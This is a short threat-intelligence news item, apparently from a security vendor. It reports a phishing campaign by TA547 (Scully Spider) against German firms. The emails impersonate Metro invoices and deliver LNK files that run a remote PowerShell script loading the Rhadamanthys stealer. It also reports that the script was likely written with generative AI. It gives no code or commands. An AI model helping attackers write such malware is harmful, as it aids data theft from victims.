HQ/EMEAFind out how we can help your business
A new cybercriminal campaign has recently launched an attack using a sophisticated PowerShell script that researchers suspect crafted with the assistance of artificial intelligence (AI) technology such as ChatGPT, Gemini, or CoPilot.
Based on reports, threat actors employed this script in an email campaign last March, targeting numerous organisations in Germany to spread the Rhadamanthys information stealer.
The Scully Spider threat group is the primary suspect for deploying this PowerShell script.
A cybersecurity researcher linked this cyberattack that uses this PowerShell script to a group known as TA547, also known as Scully Spider.
This group has been active since 2017 and has a history of distributing various malware types for Windows and Android systems, such as ZLoader/Terdot, Gootkit, Ursnif, and Mazar Bot. Recently, they’ve incorporated the Rhadamanthys modular information stealer into their toolkit, which can harvest data from sources like the clipboard, browsers, and cookies.
This campaign is the first instance where the researchers observed the Scully Spider using the Rhadamanthys malware. The actors use malicious emails to impersonate the well-known Metro cash-and-carry German brand and deceive recipients with invoices.
Inside the emails are ZIP archives, protected with the password ‘MAR26’, containing a malicious shortcut file (.LNK). Once recipients access these files, this shortcut triggers PowerShell to execute a remote script, allowing the malware to run in memory without leaving traces on the disk.
Furthermore, researchers noted distinctive characteristics in the PowerShell script, such as detailed comments accompanying each component, which are uncommon in human-generated code.
These details strongly suggest the involvement of generative AI solutions in creating the script. A separate study also highlighted that the clarity and grammatical accuracy of the comments in the suspected LLM-generated script contrast with typical developer-written code, indicating a potential AI involvement as most features do not create typographical errors.
Through experiments using LLMs like ChatGPT-4, researchers generated similar PowerShell scripts, further reinforcing the likelihood of AI’s role in crafting the malicious code used by the Scully Spider threat group.
This incident shows the evolving role of AI technology in cyber threats, highlighting the importance of robust cybersecurity measures to address such attacks.
